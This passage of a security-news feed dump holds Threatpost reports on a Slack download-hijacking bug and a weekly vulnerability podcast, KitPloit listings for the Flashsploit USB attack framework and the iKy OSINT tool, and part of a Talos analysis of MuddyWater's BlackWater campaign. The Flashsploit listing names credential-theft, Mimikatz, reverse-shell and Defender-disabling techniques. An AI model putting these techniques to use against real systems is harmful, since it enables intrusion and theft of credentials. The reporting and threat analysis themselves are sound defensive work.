reason it has to be an SMB share is because of a security check built into the platform. The Slack application filters certain characters out \u2013 including colons \u2013 so an attacker can\u2019t supply a path with a drive root.\n\n\u201cAn SMB share, however, completely bypassed this sanitation as there is no root drive needed,\u201d Wells explained. \u201cAfter setting up a remote SMB share, we could send users or channels a link that would redirect all downloads to it after they click the link.\u201d\n\n## Remote Exploitation\n\nAn attack can be carried out by both authenticated and unauthenticated users, Wells said. In the first scenario, an insider could exploit the vulnerability for corporate espionage, manipulation or to gain access to documents outside of their role or privilege level.\n\nIn the second scenario, an outsider could place crafted hyperlinks into pieces of content that could be pulled into a Slack channel via external RSS feeds.\n\n\u201cLet\u2019s consider an example with reddit.com. Here I could make a post to a very popular Reddit community that Slack users around the world are subscribed to (in this test case however, I chose a private one I owned),\u201d Wells said. \u201cI will drop an http link (because slack:// links are not allowed to be hyperlinked on Reddit) that will redirect to our malicious slack:// link and change settings when clicked. Once posted to this subreddit, our test Slack channel (that is subscribed to this subreddit feed), is now populated with the new article entry and previews the text which includes the link.\u201d\n\nSuccess here would require knowing which RSS feeds the target Slack user subscribes to, of course.\n\n## Malware and More\n\nIn addition to being an information-disclosure concern (attackers could access sensitive company documents, financial data, patient records and anything else someone shares via the platform), the vulnerability could be used as a jumping-off point for broader attacks.\n\n\u201cIf an Office Document (Word, Excel, etc.) is downloaded, the attacker\u2019s server could inject malware into it, so that when opened, the victim machine is compromised,\u201d Wells explained. He added, \u201cthe Slack user that opens/executes the downloaded file will actually instead be interacting with our modified document/script/etc off the remote SMB share, the options from there on are endless.\u201d\n\nBecause it does require user interaction to exploit, the vulnerability carries a medium-level CVSSv2 rating of 5.5. However, the researcher said that attackers can use a spoofing technique to mask the malicious URL behind a fake address, say \u201chttp://google.com,\u201d to give it more legitimacy and convince a Slack user to click on the link.\n\nMore specifically, it\u2019s possible to link to words within Slack by adding an \u201cattachment\u201d field to a Slack POST request with appropriate fields, Wells said.\n\n\u201cThe hyperlink text can be masqueraded by using the \u2018attachment\u2019 feature in Slack, which allows an attacker to replace the hyperlink\u2019s actual uniform resource identifier with any custom text, possibly fooling users into clicking,\u201d Wells noted.\n\nThe attack surface is potentially large. Slack said in January that it [has 10 million active daily users](<https://slackhq.com/slack-has-10-million-daily-active-users>), and 85,000 organizations use the paid version (it\u2019s unclear how many are Windows users). Fortunately, Slack patched the bug as part of its latest update for Slack Desktop Application for Windows, v3.4.0, so users should upgrade their apps and clients.\n\n**_Want to know more about Identity Management and navigating the shift beyond passwords? Don\u2019t miss _**[**_our Threatpost webinar on May 29 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/8039101655437489665?source=ART>)**_. Join Threatpost editor Tom Spring and a panel of experts as they discuss how cloud, mobility and digital transformation are accelerating the adoption of new Identity Management solutions. Experts discuss the impact of millions of new digital devices (and things) requesting access to managed networks and the challenges that follow._**\n", "modified": "2019-05-20T14:22:05", "published": "2019-05-20T14:22:05", "id": "THREATPOST:64126B7DBB611EF9ED06FA39085D684B", "href": "https://threatpost.com/slack-remote-file-hijacking-malware/144871/", "type": "threatpost", "title": "Slack Bug Allows Remote File Hijacking, Malware Injection", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-17T11:45:32", "bulletinFamily": "info", "description": "This week was filled with flaws, flaws and more flaws: From a zero-day under active exploit in the WhatsApp messaging app, to Patch Tuesday glitches addressed by Microsoft. Threatpost breaks down the top vulnerabilities of the week, including:\n\n * A WhatsApp zero-day vulnerability [being exploited](<https://threatpost.com/whatsapp-zero-day-exploited-in-targeted-spyware-attacks/144696/>) in targeted spyware attacks\n * Several [Cisco vulnerabilities](<https://threatpost.com/cisco-webex-remote-code-execution/144805/>), including a critical remote code-execution (RCE) vulnerabilities in the Cisco Prime Infrastructure (PI) and Evolved Programmable Network (EPN) Manager; and an unpatched, high-severity Secure Boot flaw that was [disclosed on Monday](<https://threatpost.com/cisco-bugs-unpatched-millions-devices/144692/>)\n * A new class of [speculative execution vulnerabilities](<https://threatpost.com/intel-cpus-impacted-by-new-class-of-spectre-like-attacks/144728/>) in all modern [Intel CPUs](<https://threatpost.com/intel-zombieload-side-channel-attack-10-takeaways/144771/>), dubbed Microarchitectural Data Sampling (MDS)\n * A Microsoft patch released on [Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) for an elevation-of-privileges vulnerability rated important, which is being exploited in the wild\n * Apple rolling out [173 patches](<https://threatpost.com/apple-patches-intel-side-channel-ios-macos/144743/>) in various products across its hardware portfolio, including for dangerous bugs in macOS for laptops and desktops, iPhone, Apple TV and Apple Watch.\n\n[\n\n](<http://iframe%20style=border:%20none%20src=//html5-player.libsyn.com/embed/episode/id/9818873/height/360/theme/legacy/thumbnail/yes/direction/backward/%20height=360%20width=100%%20scrolling=no%20%20allowfullscreen%20webkitallowfullscreen%20mozallowfullscreen%20oallowfullscreen%20msallowfullscreen/iframe>)\n\nClick here for [direct download](<http://traffic.libsyn.com/digitalunderground/may_17_2019_news_wrap.mp3>).\n\n_Below find a lightly-edited transcription of the news wrap podcast for the week ended May 17. _\n\n**Lindsey O\u2019Donnell**: Welcome to the Threatpost news wrap podcast for the week ended may 17. You\u2019ve got the Threatpost team here, which is myself, Lindsey O\u2019Donnell, as well as editors Tara Seals and Tom spring. How\u2019s everyone doing?\n\n**Tara Seals**: Hey, Lindsey.\n\n**Tom Spring**: Lindsey, hey.\n\n**Lindsey**: I feel like the big news of the week really revolved around just a ton of vulnerabilities. We had some interesting Microsoft flaws that were disclosed and fixed on Tuesday. But then there was also a zero-day flaw revealed in the WhatsApp messaging platform. There were some new side channel flaws revealed in Intel CPUs. There were Apple, Adobe patches. So just a whirlwind of vulnerabilities. So crazy.\n\n**Tom**: Yeah, it was, it was pretty nuts. And, you know, we still have some of the week left to see some more patching. And you know, we\u2019re just really scratching the surface with what we covered. I mean, there were so many patches this week. We couldn\u2019t cover them all. I know that, who else had patches \u2013 Schneider Electric. And I mean, it just ran the gamut. I just kept on seeing US-CERT alerts in my inbox all week long.\n\n**Lindsey**: Yeah, it\u2019s been crazy. I\u2019m sure we won\u2019t even see the end of it for this week. Tom, you led Tuesday off with some nice coverage of Microsoft Patch Tuesday. I mean, it looked like there was a zero day bug that you wrote about that was under active attack. What were some of the main takeaways there?\n\n**Tom**: Well, you know, it was really interesting Patch Tuesday. There were sort of your garden variety of vulnerabilities that were patched and then there was one mysterious one where they didn\u2019t really get into the technical specifics of it. And that was actually a zero day that Microsoft reported, that was being exploited in the wild. And it wasn\u2019t a critical vulnerability. I believe it was an important vulnerability if I\u2019m not mistaken. And it was tied to the Windows Error Reporting System. And that is essentially a Windows version of event feedback infrastructure kind of thing, where hardware and software problems are detected, and you report back to Microsoft, but the vulnerability, again, it was a little mysterious in terms of what Microsoft was sharing regarding this vulnerability. I think they were very sensitive to the fact that it was being exploited in the wild. And we\u2019ll probably learn more about it as the days come. But, that was really an interesting vulnerability, right? Anything that\u2019s being exploited in the wild and zero day is always interesting to me.\n\nBut then there was this other vulnerability. And I don\u2019t know who coined the name of the vulnerability. I\u2019m seeing it more and more today for the first time. It\u2019s called a Bluekeep vulnerability. And this was a critical patch. So this Bluekeep vulnerability impacted the Remote Desktop Services within Windows. And what made it really interesting was that it didn\u2019t affect newer systems, new Window systems \u2013 It affected older systems, such as Windows 7, Windows Server 2008. And it was also a \u201cWormable\u201d flaw, meaning that if exploited, we could have had the potential of seeing something along the lines of the worm, WannaCry, the ransomware malware of 2017. Microsoft was warning that this was a really bad one, this was a really nasty one. And then that likely there were exploits being developed in the wild. And this one could cause some serious problems. So again, really interesting that Microsoft was releasing patches for unsupported operating systems and that they were giving such a harsh warning on this one. It was really interesting, in terms of Patch Tuesday, and then I\u2019m going to kick this right off to you, Lindsey. They also had a lot of notifications, a lot of information and some patching mitigation information on the Intel flaws, which was another huge patch, a vulnerability that we learned about this week. Right?\n\n**Lindsey**: Yeah. So basically, if you remember Spectre and Meltdown, Intel revealed a new class of similar types of vulnerabilities which are side-channel flaws that take advantage of a process called speculative execution in CPUs. So Intel came out on Tuesday and disclosed a new class of side channel flaws that were impacting all modern Intel chips back to, I think 2011 was the oldest generation that was impacted, and basically, these types of attacks can potentially leak sensitive data from a system CPU. And it was a little confusing because a lot of the different names were being thrown around for the various flaws and the various attacks, but from a high level Intel said that the new class of flaws is called microarchitectural data sampling or MDS. It\u2019s funny because the attacks themselves, which were discovered and disclosed by various researchers, all had much more, in my opinion, interesting names. One of them was called Zombieload and the other was called Fallout. So it\u2019s kind of funny putting those up to Intel\u2019s names. But basically, this has been the accumulation of about a year of working to report and disclose and offer mitigation for these types of flaws. And I think that there were just so many different researchers who were involved in in various flaws and attacks for this. So it was just a lot of effort from different researchers working to disclose these flaws.\n\n**Tom**: Yeah, I found it really interesting. I read somewhere that a patched processor was going to see a 9 percent performance hit. I mean, it really begs the question how many people are going to want to patch something where you\u2019re going to see that type of performance hit on your system to obtain that level of security? You know, it\u2019ll be interesting to watch.\n\n**Lindsey**: Yeah, no, it\u2019s definitely a good point. That was part of all of it. And so, you know, as you mentioned, Intel has offered mitigation but then in addition to those mitigations for existing CPUs, they also said that the flaw will be addressed in hardware starting with select eighth and ninth generation Intel Core processors, and second gen Intel Xeon scalable processors, and then future chips will have integrated fixes as well. But beyond what Intel\u2019s doing, Tom, like you mentioned, we saw a bunch of different OEMs roll out their own scheduled update processes to correlate with these flaws such as Red Hat, Oracle, Microsoft, Apple. So, you know, this was really an effort that had waves across the industry. And I mean, from my perspective I think it\u2019s just another indication that side channel speculative execution attacks are not going anywhere \u2013 they\u2019re going to continue to plague the chip industry. Back in August even beyond Spectre and Meltdown we saw Foreshadow, I think that this will just continue, unfortunately.\n\n**Tom**: Yeah, well, it\u2019s interesting that these most recent flaws are not impacting any other chips, if I\u2019m not mistaken, other than Intel, is that correct?\n\n**Lindsey**: Yeah. So AMD came out and said that they are not impacted.\n\n**Tom**: You know, the one thing I keep waiting for is Spectre and Meltdown attacks. I mean, I know that there\u2019s tons of proof of concepts. I\u2019m grateful that we haven\u2019t and I don\u2019t know if it\u2019s just a matter of time.\n\n**Tara**: I actually had a question on that, Lindsey, because I know I covered the Apple updates, and they had addressed the side channel flaws. And they said that in the case of Apple, all of their Macbooks are impacted going back to 2011. And so it\u2019s obviously a concern for Mac users everywhere to apply these updates and kind of get things up to speed but what was interesting is that they said that danger was only really from local attackers. There was no sort of remote way to exploit this. Is that the intel that you have as well?\n\n**Lindsey**: Intel definitely came forward and said that it would be difficult to attack these vulnerabilities. I think that they made note that I think on the CVSS scale, the flaws basically range from between just over three out of 10, up to I think it was like 6.5 out of 10. So they\u2019re not really critical flaws. I think people take note of these types of flaws, because they are just something that\u2019s going to continue to plague the industry. And so I think that\u2019s kind of why it got all the news coverage that it did at this point.\n\n**Tara**: Yeah. And there\u2019s just so widespread.\n\n**Lindsey**: So but Tara, I know that you were also covering patches of your own. I know Cisco had some interesting flaws, anything that you saw, anything kind of interesting there?\n\n**Tara**: Yeah, so there were a couple of things. So, first of all, you know, Cisco has an unpatched bug that they disclosed on Monday that we covered, that impacts literally millions and millions of devices. It basically exists on almost every single piece of hardware that they sell into the enterprise business market, so you know, that that\u2019s a concern, obviously. And it\u2019s a high severity vulnerability that makes it possible for a remote code execution. So, you know, it\u2019s not a trivial bug by any stretch of the imagination. So I really was interested to cover that and a little bit shocked, to be honest, in terms of exactly how many enterprise military government networks are affected by it.\n\n**Tom**: You know, Cisco had one of the most prolific bug reporting months I think I\u2019ve ever recalled in recent history, I know that both Lindsey and I have also covered Cisco patches all month long, I kind of feel like I want to give them credit for being as transparent as they are being right out there with all of their bugs. And I also kind of want to be critical them for having so many bugs, you know, and it\u2019s kind of a chicken and egg thing because just given the sheer amount of gear that they put out there in the marketplace. So, you know, from a sheer volume perspective, it\u2019s probably maybe surprising they don\u2019t have more to be honest, but some of these businesses tend to be, you know, really impacting, because they have such a huge installed footprint of stuff out there.\n\n**Tara**: The one that I just mentioned exists in the Secure Boot hardware that they use. That\u2019s their trusted execution environment. So, you know, again, it\u2019s something to take notice of, and then, you know, they also issued a ton of patches and updates yesterday and today, one of which was an update to that unpatched bag saying that in some cases, they won\u2019t even be able to issue fixes until as late as November depending on what the products that is so, you know, they are being very transparent, but it\u2019s also a little bit alarming once you pull back the covers on some of this stuff, because it\u2019s not really just another patch, or another bug.\n\n**Tom**: so I\u2019m going to put on my tin foil hat for two seconds, and come up with a cockamamie theory that has to do with Huawei. And some of the accusations that back doors exist within their networking in their telecom gear. And I think wow, we don\u2019t have to go there. But I think there\u2019s a sense that when you take a look at some other companies, and you take a look at some of the bugs, those could be perceived as on the same level as a vulnerability as perceived within Huawei. And I wonder whether or not Cisco is going bending over backwards to make sure that, you know, there\u2019s no perception that it\u2019s not trying to patch every single bug within its product catalog.\n\n**Tara**: I think that\u2019s a really good point. Actually, there are a couple of really good points there. One is that, just the sheer amount of coding effort that it\u2019s probably taking to address all the different bags that they have is probably kind of herculean, props to them for that, and for investing in it and being transparent about it. But the other point that you made about Huawei and the other telecom suppliers is that they underlie everything that we use every single day. It\u2019s sort of against the Intel side channel flaws. No one is immune right and Huawei is one of the top five telecom manufacturers out there. Cisco actually issued a critical patch for a telecom bag today that impacts the management interface that service providers use \u2013 the full range of types of service providers out there that are serving millions and millions and millions of customers across the US and other countries.\n\nYou know, this bag impacts all of them because it is in their core network management software. And it allows remote code execution without any sort of authentic authentication by the attacker, you can just kind of get in there and do your thing, and then boom, all of a sudden, millions of subscribers are potentially impacted by it. So it\u2019s\u2026 an infiltrate once and impacts billions of potential and points.\n\n**Tom**: No, I hear you. I mean, there\u2019s a there\u2019s a lot a lot at stake. And, and I guess, again, it\u2019s like one cancels out the other, kudos to them for their transparency. But let\u2019s get the code right the first time.\n\n**Lindsey**: Yeah, and that\u2019s interesting, too, because that bug that you were just talking about Tara was disclosed after all their other fixes as well, right?\n\n**Tara**: Initially, they disclosed it on Wednesday. But then on Thursday, they issued an updated advisory for it that clarifies what exactly was vulnerable, how severe it was in terms of what all was impacted.\n\n**Tom**: You know, I think we were all impacted by bugs. I feel like I\u2019m gonna take a shower after this.\n\n**Lindsey**: We didn\u2019t even talk about the WhatsApp bug either.\n\n**Tom**: Oh yeah, that\u2019s how you covered the WhatsApp bag, which was a huge story. That was a huge story.\n\n**Tara**: Yeah. Oh my God, this has been a whirlwind. Doesn\u2019t it just kind of set the tone for the week for sure? So what was that all about? I have to confess it\u2019s been so busy with other patches. I didn\u2019t really delve too far into that, Lindsey.\n\n**Lindsey**: Yeah, so over the weekend, a zero day vulnerability was disclosed in the WhatsApp messaging platform. And it was exploited by attackers in targeted attacks. Not widespread but they were able to inject spyware onto victims phones in using this app. And what stuck out about the attack was that all you had to do is call someone on their WhatsApp app. And then that was how you were able to exploit the flaw and then install the spyware.\n\n**Tara**: Oh my gosh.\n\n**Lindsey**: So the WhatsApp flaw is now patched but you know, obviously that gained a lot of media coverage because first of all it was in an end to end encryption type of form of communications and that had people unnerved. And then the other aspect of it was this whole part about how the spyware us seem very similar to that of that is sold by the NSO Group. That kind of led a lot of people to go up in arms there. But basically, the NSO Group is finding itself in some hot water after that.\n\n**Tara**: Yeah. So sort of an unintended consequences kind of story.\n\n**Lindsey**: Yeah, I keep seeing new stories about the NSO Group, you know, because it has this Pegasus spyware that it sells and lets governments use. And basically, a lot of human rights types of companies are saying, well, this is being used against government dissidents, it\u2019s being used against human rights activists. So I think that there\u2019s kind of a lot of controversy there already.\n\n**Tara**: For sure. Like, I remember Amnesty International actually came out not too long ago saying that Pegasus have been used, or alleging that the Pegasus had been used against some of its representatives. And so yeah, it\u2019s been a human rights story for a while. And meanwhile, and so as you pointed out, you know, they keep saying oh, no, we that our clients very carefully we only trade with, you know, governments that are on the up and up and there\u2019s no issue with our business model, so it\u2019s a \u201che said she said\u201d sort of situation, but when you get evidence, like what, has turned up in this WhatsApp situation, it kind of makes you think for sure.\n\n**Lindsey**: Speaking of Amnesty International after all this happened, they and a couple of other human rights groups said that they plan to file a petition in Israeli court to revoke and NSO Group\u2019s export license, which would bar the company from making export transactions for its products. So we\u2019ll see kind of how that works out. But definitely an interesting part of the entire story. Well I hope next week, we don\u2019t have as many flaws as we did this week.\n\n**Tara**: Yes, yes, indeed.\n\n**Lindsey**: Well, Tom, Tara, thanks for coming on to the Threatpost news wrap to talk a little bit about the patch craziness this week.\n\n**Tom**: My pleasure. Thanks so much, Lindsay.\n\n**Lindsey**: All right. catch us next week on the Threatpost news wrap.\n\n**_Want to know more about Identity Management and navigating the shift beyond passwords? Don\u2019t miss _**[**_our Threatpost webinar on May 29 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/8039101655437489665?source=ART>)**_. Join Threatpost editor Tom Spring and a panel of experts as they discuss how cloud, mobility and digital transformation are accelerating the adoption of new Identity Management solutions. Experts discuss the impact of millions of new digital devices (and things) requesting access to managed networks and the challenges that follow._**\n", "modified": "2019-05-17T11:37:42", "published": "2019-05-17T11:37:42", "id": "THREATPOST:D575A0D23A7A5928C45689E81EC7DA74", "href": "https://threatpost.com/news-wrap-whatsapp-microsoft-intel-and-cisco-flaws/144837/", "type": "threatpost", "title": "News Wrap: WhatsApp, Microsoft, Intel and Cisco Flaws", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2019-05-20T17:28:57", "bulletinFamily": "tools", "description": "[ ![](https://4.bp.blogspot.com/-Jdd5X7K1S5o/XOJSaDkwJuI/AAAAAAAAO7E/lmM4cioAHlUa6w5Y5ytZhIcG_ScUCATSQCLcBGAs/s640/flashsploit_7.png) ](<https://4.bp.blogspot.com/-Jdd5X7K1S5o/XOJSaDkwJuI/AAAAAAAAO7E/lmM4cioAHlUa6w5Y5ytZhIcG_ScUCATSQCLcBGAs/s1600/flashsploit_7.png>)\n\n \n\n\nFlashsploit is an [ Exploitation Framework ](<https://www.kitploit.com/search/label/Exploitation%20Framework> \"Exploitation Framework\" ) for Attacks using ATtiny85 HID Devices such as Digispark USB Development Board, flashsploit generates Arduino IDE Compatible (.ino) Scripts based on User Input and then Starts a Listener in [ Metasploit-Framework ](<https://www.kitploit.com/search/label/Metasploit-Framework> \"Metasploit-Framework\" ) if Required by the Script, in Summary : Automatic Script Generation with Automated msfconsole. \n\n \n\n\n[ ![](https://4.bp.blogspot.com/-RG3-bsNc9F4/XOJSIZD65uI/AAAAAAAAO68/2uwBMzX71KgWHy91LnMJCELdTTFq_hsAACLcBGAs/s200/flashsploit_5.jpeg) ](<https://4.bp.blogspot.com/-RG3-bsNc9F4/XOJSIZD65uI/AAAAAAAAO68/2uwBMzX71KgWHy91LnMJCELdTTFq_hsAACLcBGAs/s1600/flashsploit_5.jpeg>)\n\n \n\n\n** Features ** \n\n\n * TODO : Add Linux and OSX Scripts \n \n** Windows ** \n \n** Data Exfiltration ** \n\n\n * Extract all WiFi [ Passwords ](<https://www.kitploit.com/search/label/Passwords> \"Passwords\" ) and Uploads an XML to SFTP Server: \n\n \n\n\n * Extract Network Configuration Information of Target System and Uploads to SFTP Server: \n\n \n\n\n * Extract Passwords and Other Critical Information using Mimikatz and Uploads to SFTP Server: \n\n \n** Reverse Shells ** \n\n\n * Get Reverse Shell by Abusing Microsoft HTML Apps (mshta): \n\n \n\n\n * Get Reverse Shell by Abusing Certification Authority Utility (certutil) \n * Get Reverse Shell by Abusing Windows Script Host (csript) \n * Get Reverse Shell by Abusing Windows Installer (msiexec) \n * Get Reverse Shell by Abusing Microsoft Register Server Utility (regsvr32) \n \n** Miscellaneous ** \n\n\n * Change Wallpaper of Target Machine: \n\n \n\n\n * Make Windows Unresponsive using a .bat Script (100% CPU and RAM usage) \n\n \n\n\n * Drop and Execute a File of your Choice, a [ ransomware ](<https://www.kitploit.com/search/label/Ransomware> \"ransomware\" ) maybe? ;) \n * Disable Windows Defender Service on Target Machine \n\n \n** Tested on ** \n\n\n * Kali Linux 2019.2 \n * BlackArch Linux \n \n** Dependencies ** \nFlashsploit Depends upon 4 Packages which are Generally Pre-installed in Major Pentest OS : \n\n\n * Metasploit-Framework \n * Python 3 \n * SFTP \n * PHP \nIf you think I should still make an Install Script, Open an issue. \n \n** Usage ** \n\n \n \n git clone https://github.com/thewhiteh4t/flashsploit.git \n cd flashsploit\n python3 flashsploit.py \n\n \n \n\n\n** [ Download Flashsploit ](<https://github.com/thewhiteh4t/flashsploit> \"Download Flashsploit\" ) **\n", "modified": "2019-05-20T13:06:07", "published": "2019-05-20T13:06:07", "id": "KITPLOIT:7321051549544272143", "href": "http://www.kitploit.com/2019/05/flashsploit-exploitation-framework-for.html", "title": "Flashsploit - Exploitation Framework For ATtiny85 Based HID Attacks", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-17T17:30:05", "bulletinFamily": "tools", "description": "[ ![](https://3.bp.blogspot.com/-t3vARZd1_3k/XN2MqlfEaqI/AAAAAAAAO6Q/xNxnVzC6AHMxJ1RIkJ8MgSdZa_t7VhjrACLcBGAs/s640/iKy-04.png) ](<https://3.bp.blogspot.com/-t3vARZd1_3k/XN2MqlfEaqI/AAAAAAAAO6Q/xNxnVzC6AHMxJ1RIkJ8MgSdZa_t7VhjrACLcBGAs/s1600/iKy-04.png>)\n\n \n\n\nProject iKy is a tool that collects information from an email and shows results in a nice visual interface. \n\n \n\n\nVisit the Gitlab Page of the [ Project ](<https://kennbroorg.gitlab.io/ikyweb/>)\n\n \n\n\n## Project \n\nFirst of all we want to advice you that we have changed the Frontend from AngularJS to Angular 7. For this reason we left the project with AngularJS as Frontend in the iKy-v1 branch and the documentation for its installation [ here ](<https://draft.blogger.com/kennbroorg/iKy/blob/iKy/README-v1.es.md>) . \n\nThe reason of changing the Frontend was to update the technology and get an easier way of installation. \n\n \n\n\n## Video \n\n \n\n\n \n\n\n## Installation \n\n### Clone repository \n \n \n git clone https://gitlab.com/kennbroorg/iKy.git\n\n \n\n\n### Install Backend \n\n \n** Redis ** \n\n\nYou must install Redis \n \n \n wget http://download.redis.io/redis-stable.tar.gz\n tar xvzf redis-stable.tar.gz\n cd redis-stable\n make\n sudo make install\n\nAnd turn on the server in a terminal \n \n \n redis-server\n\n \n** Python stuff and Celery ** \n\n\nYou must install the libraries inside requirements.txt \n \n \n pip install -r requirements.txt\n\nAnd turn on Celery in another terminal, within the directory ** backend **\n \n \n ./celery.sh\n\nFinally, again, in another terminal turn on backend app from directory ** backend **\n \n \n python app.py\n\n \n\n\n### Install Frontend \n\n** \n** ** Node ** \n\n\nFirst of all, install [ nodejs ](<https://nodejs.org/en/>) . \n\n \n** Dependencies ** \n\n\nInside the directory ** frontend ** install the dependencies \n \n \n npm install\n\n \n** Turn on Frontend Server ** \n\n\nFinally, to run frontend server, execute: \n \n \n npm start\n\n \n\n\n### Browser \n\nOpen the browser in this [ url ](<http://127.0.0.1:4200/>) \n \n\n\n### Config API Keys \n\nOnce the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed. \n\n \n\n\n * Fullcontact: Generate the APIs from [ here ](<https://support.fullcontact.com/hc/en-us/articles/115003415888-Getting-Started-FullContact-v2-APIs>)\n * Twitter: Generate the APIs from [ here ](<https://developer.twitter.com/en/docs/basics/authentication/guides/access-tokens.html>)\n * Linkedin: Only the user and password of your account must be loaded \n\n \n \n\n\n** [ Download Project iKy ](<https://gitlab.com/kennbroorg/iKy> \"Download Project iKy\" ) **\n", "modified": "2019-05-17T12:55:01", "published": "2019-05-17T12:55:01", "id": "KITPLOIT:7448093250037286383", "href": "http://www.kitploit.com/2019/05/project-iky-tool-that-collects.html", "title": "Project iKy - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2019-05-20T20:20:16", "bulletinFamily": "blog", "description": "_This blog was authored by [Danny Adamitis](<https://twitter.com/dadamitis>), [David Maynor](<https://twitter.com/Dave_Maynor>), and [Kendall McKay](<https://twitter.com/kkmckay22>)_ \n\n\n### Executive summary\n\nCisco Talos assesses with moderate confidence that a campaign we recently discovered called \"BlackWater\" is associated with suspected persistent threat actor MuddyWater. Newly associated samples from April 2019 indicate attackers have added three distinct steps to their operations, allowing them to bypass certain security controls and suggesting that MuddyWater's tactics, techniques and procedures (TTPs) have evolved to evade detection. If successful, this campaign would install a PowerShell-based backdoor onto the victim's machine, giving the threat actors remote access. While this activity indicates the threat actor is taking steps to improve its operational security and avoid endpoint detection, the underlying code remains unchanged. The findings outlined in this blog should help threat hunting teams identify MuddyWater's latest TTPs. \n \nIn this latest activity, the threat actor first added an obfuscated Visual Basic for Applications (VBA) script to establish persistence as a registry key. Next, the script triggered a PowerShell stager, likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor. The stager would then communicate with one actor-controlled server to obtain a component of the [FruityC2](<https://github.com/xtr4nge/FruityC2/blob/master/agent/ps_agent.ps1>) agent script, an open-source framework on GitHub, to further enumerate the host machine. This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity. Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field. This would make host-based detection more difficult, as an easily identifiable \"errors.txt\" file would not be generated. The threat actors also took additional steps to replace some variable strings in the more recent samples, likely in an attempt to avoid signature-based detection from Yara rules. \n \nThis activity shows an increased level of sophistication from related samples observed months prior. Between February and March 2019, probable MuddyWater-associated samples indicated that the threat actors established persistence on the compromised host, used PowerShell commands to enumerate the victim's machine and contained the IP address of the actor's command and control (C2). All of these components were included in the trojanized attachment, and therefore a security researcher could uncover the attackers' TTPs simply by obtaining a copy of the document. By contrast, the activity from April would require a multi-step investigative approach. \n \n\n\n### BlackWater document\n\n \nTalos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and [has been known](<https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/>) to primarily target entities in the Middle East. We assess with moderate confidence that these documents were sent to victims via phishing emails. One such trojanized document was created on April 23, 2019. The original document was titled \"company information list.doc\". \n \n\n\n[![](https://1.bp.blogspot.com/-t8FtPD5t-zU/XOK7a4B9unI/AAAAAAAAAss/ZO1JXbbt3m8cfrebW3ZhZOVl3OgUvL19ACLcBGAs/s640/image1.png)](<https://1.bp.blogspot.com/-t8FtPD5t-zU/XOK7a4B9unI/AAAAAAAAAss/ZO1JXbbt3m8cfrebW3ZhZOVl3OgUvL19ACLcBGAs/s1600/image1.png>)\n\n \n \nOnce the document was opened, it prompted the user to enable the macro titled \"BlackWater.bas\". The threat actor password-protected the macro, making it inaccessible if a user attempted to view the macro in Visual Basic, likely as an anti-reversing technique. The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. \n \n\n\n[![](https://3.bp.blogspot.com/-qIh0tPRRTig/XOK7hcV6eOI/AAAAAAAAAsw/ZgIyW6CmhrUB_6WF--zquV_BVRAYQBM6QCLcBGAs/s1600/image5.png)](<https://3.bp.blogspot.com/-qIh0tPRRTig/XOK7hcV6eOI/AAAAAAAAAsw/ZgIyW6CmhrUB_6WF--zquV_BVRAYQBM6QCLcBGAs/s1600/image5.png>)\n\n_Image of the macro_\n\n \nThe macro contains a PowerShell script to persist in the \"Run\" registry key, \"KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding\". The script then called the file \"\\ProgramData\\SysTextEnc.ini\" every 300 seconds. The clear text version of the SysTextEnc.ini appears to be a lightweight stager. \n \n\n\n[![](https://2.bp.blogspot.com/-zm6_ehDP2kM/XOK7nY8F5uI/AAAAAAAAAs0/1yiCo1QRR6MuhIy-2m3ENjYmcysytUKQQCLcBGAs/s1600/image2.png)](<https://2.bp.blogspot.com/-zm6_ehDP2kM/XOK7nY8F5uI/AAAAAAAAAs0/1yiCo1QRR6MuhIy-2m3ENjYmcysytUKQQCLcBGAs/s1600/image2.png>)\n\n_Screenshot of the stager found in the document_\n\n \n\n\nThe stager then reached out to the actor-controlled C2 server located at hxxp://38[.]132[.]99[.]167/crf.txt. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted [Kurdish political groups](<https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/>) and organizations in Turkey. The screenshot below shows the first few lines of the PowerShell trojan. The actors have made some small changes, such as altering the variable names to avoid Yara detection and sending the results of the commands to the C2 in the URL instead of writing them to file. However, despite these changes, the functionality remains almost unchanged. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub projected called FruityC2. \n \n\n\n[![](https://1.bp.blogspot.com/-N0tC638SLK0/XOLVtX2b4XI/AAAAAAAAGcw/bLZetNyE8NkENZgZapivBsHWLL_D64VdwCK4BGAYYCw/s1600/highlight%2B1.jpg)](<http://1.bp.blogspot.com/-N0tC638SLK0/XOLVtX2b4XI/AAAAAAAAGcw/bLZetNyE8NkENZgZapivBsHWLL_D64VdwCK4BGAYYCw/s1600/highlight%2B1.jpg>)\n\n_Image of the PowerShell script embedded in the document used to target Kurdish officials_\n\n \n\n\n[![](https://3.bp.blogspot.com/-BjA_Nla_OYc/XOLVzzZz1WI/AAAAAAAAGc4/Az0gcTWCqkEpyGr8VVJA4NhljEsy8qI-gCK4BGAYYCw/s1600/highlight%2B2.jpg)](<http://3.bp.blogspot.com/-BjA_Nla_OYc/XOLVzzZz1WI/AAAAAAAAGc4/Az0gcTWCqkEpyGr8VVJA4NhljEsy8qI-gCK4BGAYYCw/s1600/highlight%2B2.jpg>) \n\n\n \n\n\n_Image of the PowerShell script from the threat actor-controlled server_\n\n \n\n\n \nThis series of commands first sent a server hello message to the C2, followed by a subsequent hello message every 300 seconds. An example of this 